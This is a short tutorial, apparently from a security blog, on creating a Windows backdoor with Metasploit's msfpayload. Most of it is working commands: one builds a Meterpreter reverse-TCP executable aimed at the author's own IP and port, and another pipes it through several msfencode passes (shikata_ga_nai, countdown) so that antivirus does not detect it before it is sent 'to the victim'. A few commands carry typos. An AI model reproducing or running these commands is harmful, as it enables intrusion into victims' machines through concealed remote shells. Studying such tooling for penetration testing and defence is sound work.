Creating a Backdoor encoded by msfpayload


A backdoor is a program, therefore, A security researcher can generate, upload, and execute a backdoor program. Backdoors do not work with any functional program for example Trojan horse, but they are hidden inside such type program. Many of Trojan horse have hidden backdoor inside it. In this tutorial you will be able to learn “how to create backdoor and as well as Trojan horses. Let’s create a directory named “backdoors”, which will contain all created Trojan and backdoor earlier.

#mkdir /tmp/backdoors

Backdoors with metasploit:

Metasploit is a great framework, highly recommended for exploitation and maintaining access. As we discussed before The Graphical Interface of Metasploit is powerful, however, Command line is more impressive with full functionality. Msfpayload command is used to generate binaries, for various platform Microsoft and Linux platforms, as well as web applicatios.

#msfplayload windows/meterpreter/reverse_tcp S

msfpayload create an encoded backdoor

Msfpayload can be work with msfencode tools to encode the created binaries to evade antivirus detection.

Creating an Executable Binary (unencoded) by msfpayload

To see the current list of available payload in Metasploit, use msfpayload –l in command line. The given steps will use “windows/meterpreter/reverse_tcp S command. This command will display all available option needed to be set by penetration tester while converting payload into an executable binary file.

The msfpayload tools come equipped to pipe the payload with in following formats:

[C] C

[H] C-Sharp

[P] Perl

[Y] Ruby

[R] Raw

[J] JavaScript

[X] Executable

[D] Dynamic Link Library (DLL)


[W] War

[N] Python

With the majority of the data required, the analyzer can create an executable binary with the following command. Note that this is a single command and ought to be entered on a single line.

#msfpayload windows/meterpreter/reverse_tcp LHOST={Your_Ip} LPORT={Desiered_port_No} x > /tmp/backdoors/payload.exe

msfpayload create a backdoor

Following image shows the output from the creation of the payload.exe backdoor.

Creating an Executable Binary from a Payload (Encoded)

Many of times payloads.exe is detected by Antivirus, In this situation Pentester have encode payload before sending to the victim. Following command is used to create encoded payload

#msfpayload windows/meterpreter/reverse_tcp LHOST={Local_IP_Address} LPORT={Local_Port} R | msfencode –e x86/countdown –c 2 –t raw | msfencode –x –t exe –e x86/shikata_ga_nai –c 3 –k –o /tmp/backdoors/encodedPayload.exe

Output shown below in the figure :

msfpayload show the option of payloads

Leave a Reply

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.